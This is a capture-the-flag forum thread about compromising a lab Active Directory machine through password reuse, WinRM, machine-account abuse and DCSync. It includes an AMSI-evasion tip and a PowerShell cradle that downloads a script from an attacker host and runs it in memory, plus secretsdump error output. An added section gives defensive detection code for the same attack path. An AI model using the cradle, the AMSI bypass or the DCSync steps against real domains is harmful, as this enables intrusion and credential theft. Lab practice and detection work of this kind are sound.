Finally
One password from the dump is correct for this user. Try using CrackMapExec. You will get the answer.
Thanks. Am I supposed to see a hash for lorra199? Cus I get two passes and neither works. Tried password spraying but nothing.
From the dump you should have a clear-text pass.
What would be the next step to get root? Any hint?
That's odd, cause that password with ANY user on the box does not work with RCs.exe. Am I missing something?? I cannot get it to work with the user we need to move to (l*9).
The user is a Remote Management Group member. You can use the password with WinRM.
I got a couple of paths yesterday but only tried some because it was too late.
I've tried to run SharpHound (the PowerShell and executable versions) but it was blocked. PowerView also got blocked. So I had to rely on manual enumeration.
The user has the privilege to elevate a process' privileges and can add a workstation to the domain. I've thought of adding a workstation and trying to force a DCSync with it, but I needed another privilege for that (a GenericWrite type). Also tried noPac (CVE-2021-42278 + CVE-2021-42287) just because of the SeMachineAccountPrivilege; it was automated and it was late, but it also did not work.
Got a hit ("freelancer.htb 445 DC VULNERABLE") after checking a vulnerability with a tool, so I'm going to check if it can elevate my privileges.
God forbid me for being so stupid, rooted at last.
Giant kudos to @FroggieDrinks for being so patient and answering my questions.
This is the correct path. You're so close.
If you add an exploitable object to the domain there might be something you can GENERATE that is very abusable for DCSYNC.
That's what I thought… I got a GitHub which tells the exact path to do it, but some of the cmdlets don't work.
Going to see if I can tweak them to work.
Some of the cmdlets I need to abuse creating a machine and, after a couple of changes in properties, force a DCSync are from PowerSploit.
Can't seem to find an article that doesn't use one of their scripts, and every single one of them gets blocked by Defender and deleted afterwards.
If someone can give me a light here, I'd appreciate it!
You need to do AMSI evasion.
If you can't find one that works I can share what I used, just DM me. It worked for me but for some people it didn't. Just have to keep trying until you find one that works.
For AMSI bypass you can use the hardware breakpoint…
Serve it from the attacker machine using python -m http.server and on the victim:
$wc = New-Object Net.WebClient
$hbp = $wc.DownloadString("http://10.10.?.?:8888")
iex $hbp
Then to run any PowerShell you need, you download it the same way using the $wc… don't save it to disk because Defender will delete it…
The machine seems very unstable to keep on the next steps… I found the deleted user… sometimes I can restore it with lorra and sometimes I get permission denied… it is really weird…
At a certain time I was able to restore it and give DCSync rights to liza… but even then the secretsdump command just-dc didn't work… bad name, something like that… I believe this is the way but honestly I am really impressed that people solved this machine in a matter of hours… considering everything those guys are just insane…
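The path discussed in this thread (a low-privileged user creating a computer object via SeMachineAccountPrivilege, then a non-DC principal being granted replication rights and running secretsdump) leaves a specific trail in the Windows Security log: event 4741 (computer account created) and event 4662 (operation on an object) whose Properties field carries the DS-Replication-Get-Changes control-access-right GUIDs. The detection logic below is an added example and is not code from the thread or from any tool mentioned in it; the event records are constructed samples shaped like those events' fields, not real logs from the box, and the account names in them (lowpriv, ROGUE01$, DC01$) are made up.

```python
"""Flag 4741/4662 event patterns that match the machine-account + DCSync path.

Added example (not from the thread). The Event records used in run_sample()
are constructed samples, not real Windows Security log entries.
"""
from __future__ import annotations

from dataclasses import dataclass, field
from typing import Iterable

# Well-known AD extended-right GUIDs that a DRSUAPI replication request
# (what secretsdump's -just-dc path uses) needs on the domain object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}


@dataclass
class Event:
    event_id: int
    subject: str                      # SubjectUserName: who performed the action
    fields: dict = field(default_factory=dict)  # other event-specific fields


@dataclass(frozen=True)
class Alert:
    rule: str
    subject: str
    detail: str


def is_replication_request(ev: Event) -> bool:
    """4662 lists the requested access rights as {GUID} entries in Properties."""
    if ev.event_id != 4662:
        return False
    props = ev.fields.get("Properties", "").lower()
    return any(guid in props for guid in REPLICATION_RIGHTS)


def detect(events: Iterable[Event], domain_controllers: set[str], admins: set[str]) -> list[Alert]:
    """Correlate computer-account creation with later replication requests.

    domain_controllers: machine accounts (e.g. "DC01$") allowed to replicate.
    admins: accounts expected to create computer objects; anyone else doing so
    is the MachineAccountQuota / SeMachineAccountPrivilege case.
    """
    alerts: list[Alert] = []
    machine_creators: dict[str, str] = {}   # new computer account -> creator

    for ev in events:
        if ev.event_id == 4741:
            target = ev.fields.get("TargetUserName", "")
            machine_creators[target.lower()] = ev.subject
            if ev.subject not in admins:
                alerts.append(Alert("machine-account-quota", ev.subject,
                                    f"non-admin created computer account {target}"))
        elif is_replication_request(ev):
            if ev.subject in domain_controllers:
                continue  # normal DC-to-DC replication, not interesting
            creator = machine_creators.get(ev.subject.lower())
            if creator:
                detail = f"replication request by a computer account created by {creator}"
            else:
                detail = "replication request by a non-DC principal"
            alerts.append(Alert("dcsync", ev.subject, detail))
    return alerts


def run_sample() -> list[Alert]:
    """Run the rules over constructed sample events (not real log data)."""
    sample = [
        # Legitimate replication between DCs: ignored.
        Event(4662, "DC01$", {"Properties": "{" + DS_REPLICATION_GET_CHANGES_ALL + "}"}),
        # A plain user creates a computer object.
        Event(4741, "lowpriv", {"TargetUserName": "ROGUE01$"}),
        # That new computer account then asks for replication.
        Event(4662, "ROGUE01$", {"Properties": "{" + DS_REPLICATION_GET_CHANGES + "}\n\t{"
                                               + DS_REPLICATION_GET_CHANGES_ALL + "}"}),
        # A user account that was granted replication rights directly.
        Event(4662, "someuser", {"Properties": "{" + DS_REPLICATION_GET_CHANGES + "}"}),
        # 4662 for an unrelated right: not a replication request.
        Event(4662, "someuser", {"Properties": "{00299570-246d-11d0-a768-00aa006e0529}"}),
    ]
    return detect(sample, domain_controllers={"DC01$"}, admins={"Administrator"})


if __name__ == "__main__":
    for a in run_sample():
        print(f"[{a.rule}] {a.subject}: {a.detail}")
```

The rule deliberately keys on the subject of 4662 rather than on the tool: secretsdump, Mimikatz and any other DRSUAPI client all produce the same event, and a replication request from anything other than a known DC account is the signal regardless of which client sent it. In a real deployment the allow-lists come from the directory (the Domain Controllers OU and the accounts authorised to join machines) rather than from constants, and 4662 must be enabled via the "Audit Directory Service Access" subcategory with a SACL on the domain object, or it will never be logged.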
this was the error to be more specific:
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Restore-ADObject : Access is denied
At line:1 char:1
+ Restore-ADObject -Identity "ebe<removed to post here in htb>138" -Ne ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (CN=
lol… now it is even worse!
Get-ADObject : Unable to find a default server with Active Directory Web Services running.
At line:1 char:1
+ Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Pr ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [Get-ADObject], ADServerDownException
+ FullyQualifiedErrorId : ActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.GetADObject
It's random… sometimes it works… sometimes it does not… oh my god!
Yeah, it's been really difficult helping others with this box because one thing that works sometimes doesn't work for others. It's super odd.
Hats off to the people that first-blooded root in less than 3 hrs; they are really insane.
Man, this was hard! Bumping through the errors in the box and some incompatibilities, but it got through.
Thanks to @assquired, @FroggieDrinks and @SkilledLeaf, wouldn't have done it without your help.
I've had the same issue.
Kept trying until they just stabilized themselves.
Also using the 64 bit version of netcat helped.
You could try changing your vpn to a different server
Since I was making some notes about the machine and chatting about this deleted AD Object with @5ubt13, I thought about trying a session with the hashes I got in the end.
As it turns out this object has the same privileges as the Remote Management Group member user we got at the end of the "Forensics part".
Just feels like something to waste some time and get to the same point.